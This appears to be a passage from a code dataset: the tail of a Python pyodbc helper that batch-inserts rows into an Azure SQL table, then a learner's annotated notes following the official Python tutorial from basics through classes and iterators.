data[\"rows\"]\n if not rows:\n return 0\n table_name = data[\"table_name\"]\n columns_name = data[\"columns_name\"]\n total_len_data = len(rows)\n\n # Clean table if needed\n if replace:\n cleaning_query = '''DELETE FROM ''' + table_name + ''';'''\n self.execute_query(cleaning_query)\n print(C.OKBLUE + 
\"Cleaning Done\" + C.ENDC)\n\n connection_kwargs = self.credentials()\n con = pyodbc.connect(**connection_kwargs)\n cursor = con.cursor()\n\n small_batch_size = int(2099 / len(columns_name))\n\n print(\"Initiate send_to_azure...\")\n\n # Initialize counters\n boolean = True\n question_mark_pattern = \"(%s)\" % \",\".join([\"?\" for i in range(len(rows[0]))])\n counter = 0\n while boolean:\n temp_row = []\n question_mark_list = []\n for i in range(small_batch_size):\n if rows:\n value_list = rows.pop()\n for i in range(len(value_list)):\n if isinstance(value_list[i], str):\n value_list[i] = replace_all_emoji(value_list[i])\n temp_row.append(value_list)\n question_mark_list.append(question_mark_pattern)\n else:\n boolean = False\n continue\n counter = counter + len(temp_row)\n # percent = round(float(counter * 100) / total_len_data)\n if sub_commit:\n suffix = \"%% rows sent\"\n print_progress_bar(counter, total_len_data, suffix=suffix)\n else:\n suffix = \"% rows prepared to be sent\"\n print_progress_bar(counter, total_len_data, suffix=suffix)\n data_values_str = ','.join(question_mark_list)\n columns_name_str = \"\\\",\\\"\".join(columns_name)\n inserting_request = '''INSERT INTO %s (\"%s\") VALUES %s ;''' % (\n table_name, columns_name_str, data_values_str)\n\n final_data = [y for x in temp_row for y in x]\n if final_data:\n try:\n cursor.execute(inserting_request, final_data)\n except Exception as e:\n cursor.close()\n con.close()\n raise e\n\n if sub_commit:\n con.commit()\n if not sub_commit:\n con.commit()\n cursor.close()\n con.close()\n\n print(\"data sent to azure\")\n print(\"Total rows: %s\" % str(total_len_data))\n print(C.BOLD + \"Total time in seconds : %s\" % str((datetime.datetime.now() - start).seconds) + C.ENDC)\n return 0\n\n def _send_data_custom(self,\n data,\n replace=True,\n batch_size=1000,\n other_table_to_update=None,\n sub_commit=True\n ):\n data_copy = copy.deepcopy(data)\n try:\n self._send(data, replace=replace, sub_commit=sub_commit)\n except Exception as e:\n print(e)\n if \"invalid object name\" in str(e).lower():\n create_table(\n self,\n data_copy\n )\n elif \"invalid column name\" in str(e).lower():\n create_columns(self, data_copy, other_table_to_update)\n elif \"string or binary data would be truncated\" in str(e).lower():\n change_column_type(self, data_copy, other_table_to_update)\n elif \"The conversion of the nvarchar value\" in str(e) and \"overflowed an int column\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n elif \"Use a larger integer column\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n elif \"Conversion failed when converting the nvarchar value\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n else:\n raise e\n self._send_data_custom(data_copy, replace=replace, batch_size=batch_size,\n other_table_to_update=other_table_to_update, sub_commit=sub_commit)\n","sub_path":"pyzure/AzureDBStream.py","file_name":"AzureDBStream.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291392930","text":"# Python Tutorial\n# https://docs.python.org/3/tutorial/index.html\n\n\n# Stuff I need to work on\n# List comprehensions / nested list comprehensions\n# Generator expressions\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 1: Whetting Appetite\n# has no 
code\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 2: Using Interpreter\nthe_world_is_flat = True\nif the_world_is_flat:\n print(\"Be careful not to fall off!\") # prints\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 3: Informal Intro\n# this is the first comment\nspam = 1 # and this is the second comment\n # ... and now a third!\ntext = \"# This is not a comment because it's inside quotes.\"\nwidth = 20\nheight = 5 * 9\nprint(width * height) # 900, remains int\nprint(4 * 3.75 - 1) # 14.0, converts to float\nprint('C:\\some\\name') # here \\n means newline!\nprint(r'C:\\some\\name') # note the r before the quote\nprint(\"\"\"\\\nUsage: thingy [OPTIONS]\n -h Display this usage message\n -H hostname Hostname to connect to\n\"\"\") # \"\"\" to span multiple lines\nprint(3 * 'un' + 'ium') # unununium\nword = 'Python'\nprint(word[0]) # character in position 0, 'P'\nprint(word[5]) # character in position 5, 'n'\nprint(word[-2]) # second-last character\nprint(word[:2] + word[2:]) # combines to 'Python', s[:i] + s[i:] is always equal to s\nprint(word[4:42]) # knows where it ends; 'on'\nprint('J' + word[1:]) # 'Jython'\ns = 'supercalifragilisticexpialidocious'\nprint(len(s)) # 34\nsquares = [1, 4, 9, 16, 25]\nprint(squares[-3:])\nprint(squares + [36, 49, 64, 81, 100])\ncubes = [1, 8, 27, 65, 125] # something's wrong here\ncubes[3] = 64 # replace the wrong value\nprint(cubes) # [1, 8, 27, 64, 125]\ncubes.append(216) # add the cube of 6\ncubes.append(7 ** 3) # and the cube of 7\nprint(cubes) # [1, 8, 27, 64, 125, 216, 343]\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\nletters[2:5] = ['C', 'D', 'E']\nprint(letters) # ['a', 'b', 'C', 'D', 'E', 'f', 'g']\nletters[2:5] = []\nprint(letters) # ['a', 'b', 'f', 'g']\nprint(len(letters)) # 4\nletters[:] = []\nprint(letters) # []\na = ['a', 'b', 'c']\nn = [1, 2, 3]\nx = [a, n]\nprint(x) # [['a', 'b', 'c'], [1, 2, 3]]\nprint(x[0]) # ['a', 'b', 'c']\nprint(x[0][1]) # 'b'\na, b = 0, 1\nwhile a < 10: # print fibonacci from 0 to 10\n print(a, end = \", \")\n a, b = b, a+b\nprint()\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 4: Flow Control and Functions\nx = int(input(\"Please enter an integer: \"))\nif x < 0:\n x = 0\n print('Negative changed to zero')\nelif x == 0:\n print('Zero')\nelif x == 1:\n print('Single')\nelse:\n print('More')\nwords = ['cat', 'window', 'defenestrate']\nfor w in words:\n print(w, len(w))\nfor i in range(5):\n print(i)\nprint(range(5, 10)) # 5, 6, 7, 8, 9\nprint(range(0, 10, 3)) # 0, 3, 6, 9\nprint(range(-10, -100, -30)) # -10, -40, -70\na = ['Mary', 'had', 'a', 'little', 'lamb']\nfor i in range(len(a)):\n print(i, a[i])\nprint(range(10))\nprint(list(range(5)))\nfor n in range(2, 10):\n for x in range(2, n):\n if n % x == 0:\n print(n, 'equals', x, '*', n//x)\n break\n else:\n # loop fell through without finding a factor, aka break statement isnt triggered\n print(n, 'is a prime number')\nfor num in range(2, 10):\n if num % 2 == 0:\n print(\"Found an even number\", num)\n continue\n print(\"Found a number\", num)\n \n# function definition\ndef fib(n): # write Fibonacci series up to n\n \"\"\"Print a Fibonacci series up to n.\"\"\"\n a, b = 0, 1\n while a < n:\n print(a, end=' ')\n a, b = b, a+b\n print()\n \n# Now 
call the function we just defined:\nfib(2000)\nprint(fib) # \nf = fib\nf(100)\nfib(0)\nprint(fib(0)) # None\n\ndef fib2(n): # return Fibonacci series up to n\n \"\"\"Return a list containing the Fibonacci series up to n.\"\"\"\n result = []\n a, b = 0, 1\n while a < n:\n result.append(a) # see below\n a, b = b, a+b\n return result\n\nf100 = fib2(100) # call it\nprint(f100) # write the result\n\ndef ask_ok(prompt, retries=4, reminder='Please try again!'):\n while True:\n ok = input(prompt)\n if ok in ('y', 'ye', 'yes'):\n return True\n if ok in ('n', 'no', 'nop', 'nope'):\n return False\n retries = retries - 1\n if retries < 0:\n raise ValueError('invalid user response')\n print(reminder)\n\nprint(ask_ok('Do you really want to quit? '))\nprint(ask_ok('OK to overwrite the file? ', 2))\nprint(ask_ok('OK to overwrite the file? ', 2, 'Come on, only yes or no!'))\n\ni = 5\ndef f(arg=i):\n print(arg)\ni = 6\nf() # prints 5 because default argument only evaluated once, at function definition\n\ndef f2(a, L=[]):\n L.append(a) # appends to each item, L is a reference to a list\n return L\n\nprint(f2(1)) # [1]\nprint(f2(2)) # [1, 2]\nprint(f2(3)) # [1, 2, 3]\n\ndef f3(a, L=None):\n if L is None:\n L = []\n L.append(a) # appends a to L; if L not passed, returns [a]\n return L\n\nprint(f3(1)) # [1]\nprint(f3(2)) # [2]\nprint(f3(3)) # [3]\nprint(f3(3, [1, 2])) # [1, 2, 3]\n\ndef parrot(voltage, state='a stiff', action='voom', ptype='Norwegian Blue'): # keyword arguments, kwarg = value\n print(\"-- This parrot wouldn't\", action, end=' ')\n print(\"if you put\", voltage, \"volts through it.\")\n print(\"-- Lovely plumage, the\", ptype)\n print(\"-- It's\", state, \"!\")\n\n# these are all valid\nparrot(1000) # 1 positional argument\nparrot(voltage=1000) # 1 keyword argument\nparrot(voltage=1000000, action='VOOOOOM') # 2 keyword arguments\nparrot(action='VOOOOOM', voltage=1000000) # 2 keyword arguments\nparrot('a million', 'bereft of life', 'jump') # 3 positional arguments\nparrot('a thousand', state='pushing up the daisies') # 1 positional, 1 keyword\n# invalid would be: \n# parrot() # required argument missing\n# parrot(voltage=5.0, 'dead') # non-keyword argument after a keyword argument\n# parrot(110, voltage=220) # duplicate value for the same argument\n# parrot(actor='John Cleese') # unknown keyword argument\n\ndef cheeseshop(kind, *arguments, **keywords): # accepts a mandatory arg, then args and kwargs\n print(\"-- Do you have any\", kind, \"?\")\n print(\"-- I'm sorry, we're all out of\", kind)\n for arg in arguments:\n print(arg)\n print(\"-\" * 40)\n for kw in keywords:\n print(kw, \":\", keywords[kw])\n \ncheeseshop(\"Limburger\", \"It's very runny, sir.\", # arg, *args, *kwargs\n \"It's really very, VERY runny, sir.\",\n shopkeeper=\"Michael Palin\",\n client=\"John Cleese\",\n sketch=\"Cheese Shop Sketch\")\ncheeseshop(\"Limburger\") # arg only\n\ndef concat(*args, sep=\"/\"): # anything after *args is keyword-only\n return sep.join(args)\n\nprint(concat(\"earth\", \"mars\", \"venus\")) # 'earth/mars/venus'\nprint(concat(\"earth\", \"mars\", \"venus\", sep=\".\")) # 'earth.mars.venus'\n\nprint(list(range(3, 6))) # normal call with separate arguments, [3, 4, 5]\nargs = [3, 6]\nprint(list(range(*args))) # call with arguments unpacked from a list using the *, [3, 4, 5]\n\ndef parrot2(voltage, state='a stiff', action='voom'):\n print(\"-- This parrot wouldn't\", action, end=' ')\n print(\"if you put\", voltage, \"volts through it.\", end=' ')\n print(\"E's\", state, \"!\")\n\nd = {\"voltage\": 
\"four million\", \"state\": \"bleedin' demised\", \"action\": \"VOOM\"}\nparrot2(**d) # unpack kwargs with **\n\ndef make_incrementor(n):\n return lambda x: x + n\n\nf = make_incrementor(42)\nprint(f(0)) # 42\nprint(f(1)) # 43\n\npairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')]\npairs.sort(key=lambda pair: pair[1])\nprint(pairs) # [(4, 'four'), (1, 'one'), (3, 'three'), (2, 'two')]\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 5: Data Structures\nfruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana']\nprint(fruits.count('apple')) # 2\nprint(fruits.count('tangerine')) # 0\nprint(fruits.index('banana')) # 3, for 1st appearance\nprint(fruits.index('banana', 4)) # 6, Find next banana starting a position 4\nfruits.reverse()\nprint(fruits) # ['banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange']\nfruits.append('grape')\nprint(fruits) # ['banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange', 'grape']\nfruits.sort() # here, sorts alphabetically\nprint(fruits) # ['apple', 'apple', 'banana', 'banana', 'grape', 'kiwi', 'orange', 'pear']\nprint(fruits.pop()) # 'pear'\n\nstack = [3, 4, 5]\nstack.append(6)\nstack.append(7)\nprint(stack) # [3, 4, 5, 6, 7]\nprint(stack.pop()) # 7\nprint(stack) # [3, 4, 5, 6]\nstack.pop() # 6\nstack.pop() # 5\nprint(stack) # [3, 4]\n\nsquares = []\nfor x in range(10):\n squares.append(x**2)\nprint(squares) # [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]\nsquares = list(map(lambda x: x**2, range(10)))\nprint(squares) # same thing\nsquares = [x**2 for x in range(10)]\nprint(squares) # same thing again\n\n# list comprehensions\nprint([(x, y) for x in [1,2,3] for y in [3,1,4] if x != y]) # [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]\ncombs = []\nfor x in [1,2,3]:\n for y in [3,1,4]:\n if x != y:\n combs.append((x, y))\nprint(combs) # same thing: [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]\n\nvec = [-4, -2, 0, 2, 4] \nprint([x*2 for x in vec]) # create a new list with the values doubled, [-8, -4, 0, 4, 8]\nprint([x for x in vec if x >= 0]) # filter the list to exclude negative numbers, [0, 2, 4]\nprint([abs(x) for x in vec]) # apply a function to all the elements, [4, 2, 0, 2, 4]\nfreshfruit = [' banana', ' loganberry ', 'passion fruit ']\nprint([weapon.strip() for weapon in freshfruit]) # call a method on each element, ['banana', 'loganberry', 'passion fruit']\nprint([(x, x**2) for x in range(6)]) # create a list of 2-tuples like (number, square), [(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25)]\nvec = [[1,2,3], [4,5,6], [7,8,9]]\nprint([num for elem in vec for num in elem]) # flatten a list using a listcomp with two 'for', [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n# nested list comprehensions\nmatrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n ]\nprint([[row[i] for row in matrix] for i in range(4)]) # transpose, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\ntransposed = []\nfor i in range(4):\n transposed.append([row[i] for row in matrix])\nprint(transposed) # same thing, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\ntransposed = []\nfor i in range(4):\n # the following 3 lines implement the nested listcomp\n transposed_row = []\n for row in matrix:\n transposed_row.append(row[i])\n transposed.append(transposed_row)\nprint(transposed) # same thing again, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\nprint(list(zip(*matrix))) # tuples now, but transposed: [(1, 5, 9), (2, 6, 10), (3, 7, 11), 
(4, 8, 12)]\n\na = [-1, 1, 66.25, 333, 333, 1234.5]\ndel a[0]\nprint(a) # [1, 66.25, 333, 333, 1234.5]\ndel a[2:4]\nprint(a) # [1, 66.25, 1234.5]\ndel a[:]\nprint(a) # []\ndel a\n\n# tuples\nt = 12345, 54321, 'hello!'\nprint(t[0]) # 12345\nprint(t) # (12345, 54321, 'hello!')\nv = ([1, 2, 3], [3, 2, 1])\nprint(v) # ([1, 2, 3], [3, 2, 1])\nempty = ()\nsingleton = 'hello', # <-- note trailing comma\nlen(empty) # 0\nlen(singleton) # 1\nprint(singleton) # ('hello',)\nx, y, z = t\nprint(x) # 12345\nprint(y) # 54321\nprint(z) # 'hello!'\n\n# sets\nbasket = {'apple', 'orange', 'apple', 'pear', 'orange', 'banana'}\n# show that duplicates have been removed\nprint(basket) # {'orange', 'banana', 'pear', 'apple'}\n# fast membership testing\nprint('orange' in basket) # True\nprint('crabgrass' in basket) # False\n# Demonstrate set operations on unique letters from two words\na = set('abracadabra')\nb = set('alacazam')\nprint(a) # unique letters in a, {'a', 'r', 'b', 'c', 'd'}\nprint(a - b) # letters in a but not in b, {'r', 'd', 'b'}\nprint(a | b) # letters in a or b or both, {'a', 'c', 'r', 'd', 'b', 'm', 'z', 'l'}\nprint(a & b) # letters in both a and b, {'a', 'c'}\nprint(a ^ b) # letters in a or b but not both, {'r', 'd', 'b', 'm', 'z', 'l'}\na = {x for x in 'abracadabra' if x not in 'abc'} # list comprehension on a set\nprint(a) # {'r', 'd'}\n\n# dictionaries\ntel = {'jack': 4098, 'sape': 4139}\ntel['guido'] = 4127\nprint(tel) # {'jack': 4098, 'sape': 4139, 'guido': 4127}\nprint(tel['jack']) # 4098\ndel tel['sape']\ntel['irv'] = 4127\nprint(tel) # {'jack': 4098, 'guido': 4127, 'irv': 4127}\nprint(list(tel)) # ['jack', 'guido', 'irv']\nprint(sorted(tel)) # ['guido', 'irv', 'jack']\nprint('guido' in tel) # True\nprint('jack' not in tel) # False\nprint(dict([('sape', 4139), ('guido', 4127), ('jack', 4098)])) # {'sape': 4139, 'guido': 4127, 'jack': 4098}\nprint(dict(sape=4139, guido=4127, jack=4098)) # {'sape': 4139, 'guido': 4127, 'jack': 4098}\nprint({x: x**2 for x in (2, 4, 6)}) # {2: 4, 4: 16, 6: 36}\n\n# looping techniques\nknights = {'gallahad': 'the pure', 'robin': 'the brave'}\nfor k, v in knights.items(): # unpacks\n print(k, v)\nfor i, v in enumerate(['tic', 'tac', 'toe']): # pulls indices and values\n print(i, v)\nquestions = ['name', 'quest', 'favorite color'] # use zip to compare 2 lists\nanswers = ['lancelot', 'the holy grail', 'blue']\nfor q, a in zip(questions, answers):\n print('What is your {0}? 
It is {1}.'.format(q, a))\nfor i in reversed(range(1, 10, 2)): # count backwards\n print(i)\nbasket = ['apple', 'orange', 'apple', 'pear', 'orange', 'banana']\nfor f in sorted(set(basket)): # sort but leave original item unaltered\n print(f)\nimport math\nraw_data = [56.2, float('NaN'), 51.7, 55.3, 52.5, float('NaN'), 47.8]\nfiltered_data = []\nfor value in raw_data:\n if not math.isnan(value):\n filtered_data.append(value)\nprint(filtered_data) # [56.2, 51.7, 55.3, 52.5, 47.8]\n\n# more conditions\n# in, not in: check if contained (or not)\n# is, is not: check for exactness (or not)\n# a < b == c: operators can be chained\n# A and not B or C is equivalent to (A and (not B)) or C\nstring1, string2, string3 = '', 'Trondheim', 'Hammer Dance'\nnon_null = string1 or string2 or string3\nprint(non_null) # 'Trondheim'\n# assignment cannot occur inside expressions\nprint((1, 2, 3) < (1, 2, 4)) # all 7 will print True\nprint([1, 2, 3] < [1, 2, 4])\nprint('ABC' < 'C' < 'Pascal' < 'Python')\nprint((1, 2, 3, 4) < (1, 2, 4))\nprint((1, 2) < (1, 2, -1))\nprint((1, 2, 3) == (1.0, 2.0, 3.0))\nprint((1, 2, ('aa', 'ab')) < (1, 2, ('abc', 'a'), 4))\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 6: Modules\nimport fibo # customarily at the beginning\nfibo.fibo(1000) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987\nprint(fibo.fibo2(100)) # [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nprint(fibo.__name__) # 'fibo'\nfibo = fibo.fibo # assign a local name\nfibo(500) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\ndel fibo\nfrom fibo import fibo, fibo2 # directly imports without having to assign local name\nfibo(500) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\nimport sys, builtins\nprint(dir(fibo))\nprint(dir(sys))\nprint(dir(builtins))\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 7: Input and Output\nyear = 2016\nevent = 'Referendum'\nprint(f'Results of the {year} {event}') # 'Results of the 2016 Referendum', formaatted string literals\nyes_votes = 42_572_654\nno_votes = 43_132_495\npercentage = yes_votes / (yes_votes + no_votes)\nprint('{:-9} YES votes {:2.2%}'.format(yes_votes, percentage)) # ' 42572654 YES votes 49.67%'\ns = 'Hello, world.'\nprint(str(s)) # 'Hello, world.'\nprint(repr(s)) # \"'Hello, world.'\"\nprint(str(1/7)) # '0.14285714285714285'\nx = 10 * 3.25\ny = 200 * 200\ns = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'\nprint(s) # The value of x is 32.5, and y is 40000...\n# The repr() of a string adds string quotes and backslashes:\nhello = 'hello, world\\n'\nhellos = repr(hello)\nprint(hellos) # 'hello, world\\n'\n# The argument to repr() may be any Python object:\nprint(repr((x, y, ('spam', 'eggs')))) # \"(32.5, 40000, ('spam', 'eggs'))\"\nimport math\nprint(f'The value of pi is approximately {math.pi:.3f}.') # The value of pi is approximately 3.142. // formatted string literal\ntable = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 7678}\nfor name, phone in table.items():\n print(f'{name:10} ==> {phone:10d}') # use the : to make it a certain number of characters; helps with alignment\nanimals = 'eels'\nprint(f'My hovercraft is full of {animals}.') # My hovercraft is full of eels. '!a' applies ascii(), '!s' applies str()\nprint(f'My hovercraft is full of {animals!r}.') # My hovercraft is full of 'eels'. 
'!r' applies repr()\nprint('We are the {} who say \"{}!\"'.format('knights', 'Ni')) # We are the knights who say \"Ni!\" via str.format()\nprint('{0} and {1}'.format('spam', 'eggs')) # spam and eggs\nprint('{1} and {0}'.format('spam', 'eggs')) # eggs and spam\nprint('This {food} is {adjective}.'.format(food='spam', adjective='absolutely horrible')) # This spam is absolutely horrible.\nprint('The story of {0}, {1}, and {other}.'.format('Bill', 'Manfred', other='Georg')) # The story of Bill, Manfred, and Georg.\ntable = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 8637678}\nprint('Jack: {0[Jack]:d}; Sjoerd: {0[Sjoerd]:d}; Dcab: {0[Dcab]:d}'.format(table)) # Jack: 4098; Sjoerd: 4127; Dcab: 8637678 via []\nprint('Jack: {Jack:d}; Sjoerd: {Sjoerd:d}; Dcab: {Dcab:d}'.format(**table)) # Jack: 4098; Sjoerd: 4127; Dcab: 8637678 via kwargs\nfor x in range(1, 11):\n print('{0:2d} {1:3d} {2:4d}'.format(x, x*x, x*x*x))\nfor x in range(1, 11):\n print(repr(x).rjust(2), repr(x*x).rjust(3), end=' ')\n # Note use of 'end' on previous line\n print(repr(x*x*x).rjust(4))\nprint('12'.zfill(5)) # '00012'\nprint('-3.14'.zfill(7)) # '-003.14'\nprint('3.14159265359'.zfill(5)) # '3.14159265359'\nprint('The value of pi is approximately %5.3f.' % math.pi) # The value of pi is approximately 3.142. old-school style\nf = open('workfile', 'w') # 'r' read (assumed if omitted), 'w' writing (an existing file will be erased), 'a' appending, 'r+' both reading and writing\nprint(f.write('This is a test\\n')) # prints # of chars written, 15\nvalue = ('the answer', 42)\ns = str(value) # convert the tuple to string\nprint(f.write(s)) # 18\nf.close()\nwith open('workfile') as f:\n for line in f:\n print(line, end='') # prints the above two lines\nprint('\\n' + str(f.closed)) # True\nf = open('workfile2', 'wb')\nf.close()\nf = open('workfile2', 'r+b')\nprint(f.write(b'0123456789abcdef')) # 16\nprint(f.seek(5)) # Go to the 6th byte in the file, returns char index\nprint(f.read(1)) # b'5'\nprint(f.seek(-3, 2)) # Go to the 3rd byte before the end\nprint(f.read(1)) # b'd'\nf.close()\n\n# Saving structured data with JSON (JavaScript Object Notation)\nimport json\nprint(json.dumps([1, 'simple', 'list'])) # '[1, \"simple\", \"list\"]'\nx = [1, 'simple', 'list']\nf = open('jsonfile', 'w')\nf.close()\nwith open('jsonfile', 'r+') as f:\n json.dump(x, f)\n f.seek(0) # otherwise it tries to read from end of file\n x = json.load(f)\n print(x)\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 8: Errors and Exceptions\nwhile True: # repeats until a number is entered\n try:\n x = int(input(\"Please enter a number: \"))\n break\n except ValueError:\n print(\"Oops! That was no valid number. 
Try again...\")\n\nclass B(Exception):\n    pass\nclass C(B):\n    pass\nclass D(C):\n    pass\nfor cls in [B, C, D]: # prints B, C, D\n    try:\n        raise cls()\n    except D:\n        print(\"D\")\n    except C:\n        print(\"C\")\n    except B: # must be last, or it will print B, B, B as D is an extension of C is an extension of B\n        print(\"B\")\n\ntry:\n    arg = 'myfile.txt'\n    f = open(arg)\n    s = f.readline()\n    i = int(s.strip())\nexcept OSError as err:\n    print(\"OS error: {0}\".format(err))\nexcept ValueError:\n    print(\"Could not convert data to an integer.\")\nexcept:\n    print(\"Unexpected error:\", sys.exc_info()[0])\n    raise\nelse: # runs if no exception\n    f.seek(0)\n    print(arg, 'has', len(f.readlines()), 'lines')\n    f.close()\n\ntry:\n    raise Exception('spam', 'eggs') # force raising exception\n    raise ValueError # shorthand for 'raise ValueError()'\nexcept Exception as inst:\n    print(type(inst)) # the exception instance\n    print(inst.args) # arguments stored in .args\n    print(inst) # __str__ allows args to be printed directly, but may be overridden in exception subclasses\n    x, y = inst.args # unpack args\n    print('x =', x)\n    print('y =', y)\n\ndef this_fails():\n    x = 1/0\ntry:\n    this_fails() # exceptions handled in called functions by try clause\nexcept ZeroDivisionError as err:\n    print('Handling run-time error:', err) # Handling run-time error: division by zero\nfinally: # always runs\n    print('Goodbye, world!')\n    \n# User-defined exceptions\nclass Error(Exception):\n    \"\"\"Base class for exceptions in this module.\"\"\"\n    pass\nclass InputError(Error):\n    \"\"\"Exception raised for errors in the input.\n    Attributes:\n    \n        expression -- input expression in which the error occurred\n        message -- explanation of the error\n    \"\"\"\n    def __init__(self, expression, message):\n        self.expression = expression\n        self.message = message\nclass TransitionError(Error):\n    \"\"\"Raised when an operation attempts a state transition that's not\n    allowed.\n    \n    Attributes:\n        previous -- state at beginning of transition\n        next -- attempted new state\n        message -- explanation of why the specific transition is not allowed\n    \"\"\"\n    def __init__(self, previous, next, message):\n        self.previous = previous\n        self.next = next\n        self.message = message\n\ndef divide(x, y):\n    try:\n        result = x / y\n    except ZeroDivisionError:\n        print(\"division by zero!\")\n    else:\n        print(\"result is\", result)\n    finally:\n        print(\"executing finally clause\")\ndivide(2, 1)\ndivide(2, 0)\n# divide(\"2\", \"1\") # raises TypeError\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 9: Classes\ndef scope_test():\n    def do_local():\n        spam = \"local spam\"\n    def do_nonlocal():\n        nonlocal spam\n        spam = \"nonlocal spam\"\n    def do_global():\n        global spam\n        spam = \"global spam\"\n    spam = \"test spam\"\n    do_local()\n    print(\"After local assignment:\", spam) # test spam; do_local changed only its own local scope\n    do_nonlocal()\n    print(\"After nonlocal assignment:\", spam) # nonlocal spam; changed in the enclosing function's scope, not the module\n    do_global()\n    print(\"After global assignment:\", spam) # nonlocal spam; the global binding changed, but not scope_test's local spam\nscope_test()\nprint(\"In global scope:\", spam) # global spam; do_global() rebound the module-level name\n\nclass MyClass:\n    \"\"\"A simple example class\"\"\"\n    i = 12345\n    def f(self):\n        return 'hello world'\n    def __init__(self):\n        self.data = []\n\nx = MyClass() # instantiation: the class is called like a function\n\nclass Complex:\n    def __init__(self, realpart, imagpart):\n        self.r = realpart\n        self.i = imagpart\n    \n
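# Editor's note: a small added extension, not part of the original tutorial.
# Defining __repr__ makes instances print readably; Complex is the class just
# above, and ComplexWithRepr is a name introduced here for illustration.
class ComplexWithRepr(Complex):
    def __repr__(self):
        return 'Complex({!r}, {!r})'.format(self.r, self.i)
print(ComplexWithRepr(3.0, -4.5)) # Complex(3.0, -4.5)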
x = Complex(3.0, -4.5)\nx.counter = 1 # can create data attributes at runtime\nwhile x.counter < 10:\n    x.counter = x.counter * 2\nprint(x.counter) # 16\ndel x.counter\nprint(x.r, x.i) # (3.0, -4.5)\n\nclass Dog:\n\n    kind = 'canine' # class variable shared by all instances\n    tricks = [] # mistaken use of a class variable\n\n    def __init__(self, name):\n        self.name = name # instance variable unique to each instance\n#        self.tricks = [] # creates a new empty list for each dog; should be here to get correct result\n    def add_trick(self, trick):\n        self.tricks.append(trick)\n\nd = Dog('Fido')\ne = Dog('Buddy')\nprint(d.kind) # shared by all dogs, 'canine'\nprint(e.kind) # shared by all dogs, 'canine'\nprint(d.name) # unique to d, 'Fido'\nprint(e.name) # unique to e, 'Buddy'\nd.add_trick('roll over')\ne.add_trick('play dead')\nprint(d.tricks) # unexpectedly shared by all dogs, ['roll over', 'play dead']\n\n# Function defined outside the class\ndef f1(self, x, y):\n    return min(x, x+y)\n\nclass C2:\n    f = f1\n\n    def g(self):\n        return 'hello world'\n\n    h = g\n    \nclass Bag:\n    def __init__(self):\n        self.data = []\n\n    def add(self, x):\n        self.data.append(x)\n\n    def addtwice(self, x):\n        self.add(x)\n        self.add(x)\n    \nclass C3(Bag): # derived class / inheritance (derives Bag so self.data exists)\n    def add(self, x):\n        self.data.append(str(x)) # overrides Bag.add(); calling addtwice on a C3 instance calls this twice\n\nclass Mapping:\n    def __init__(self, iterable):\n        self.items_list = []\n        self.__update(iterable)\n\n    def update(self, iterable):\n        for item in iterable:\n            self.items_list.append(item)\n\n    __update = update   # private copy of original update() method\n\nclass MappingSubclass(Mapping):\n\n    def update(self, keys, values):\n        # provides new signature for update()\n        # but does not break __init__()\n        for item in zip(keys, values):\n            self.items_list.append(item)\n\nclass Employee:\n    pass\n\njohn = Employee() # Create an empty employee record\n\n# Fill the fields of the record\njohn.name = 'John Doe'\njohn.dept = 'computer lab'\njohn.salary = 1000\n\nfor element in [1, 2, 3]:\n    print(element)\nfor element in (1, 2, 3):\n    print(element)\nfor key in {'one':1, 'two':2}:\n    print(key)\nfor char in \"123\":\n    print(char)\nfor line in open(\"myfile.txt\"):\n    print(line, end='')\nprint()\n\ns = 'abc'\nit = iter(s)\nprint(it) # <str_iterator object at 0x...>\nfor i in range(len(s) + 1):\n    try:\n        print(next(it)) # 'a', 'b', 'c'\n    except:\n        print(\"Error:\", sys.exc_info()[0])\n\nclass Reverse:\n    \"\"\"Iterator for looping over a sequence backwards.\"\"\"\n    def __init__(self, data):\n        self.data = data\n        self.index = len(data)\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self.index == 0:\n            raise StopIteration\n        self.index = self.index - 1\n        return self.data[self.index]\n\nrev = Reverse('spam')\nprint(iter(rev)) # <__main__.Reverse object at 0x00A1DB50>\nfor char in rev:\n    print(char) # 'm', 'a', 'p', 's'\n\ndef reverse(data):\n    for index in range(len(data)-1, -1, -1):\n        yield data[index]\n\nfor char in reverse('golf'):\n    print(char) # 'f', 'l', 'o', 'g'\n    \nprint(sum(i*i for i in range(10))) # sum of squares, 285\nxvec = [10, 20, 30]\nyvec = [7, 5, 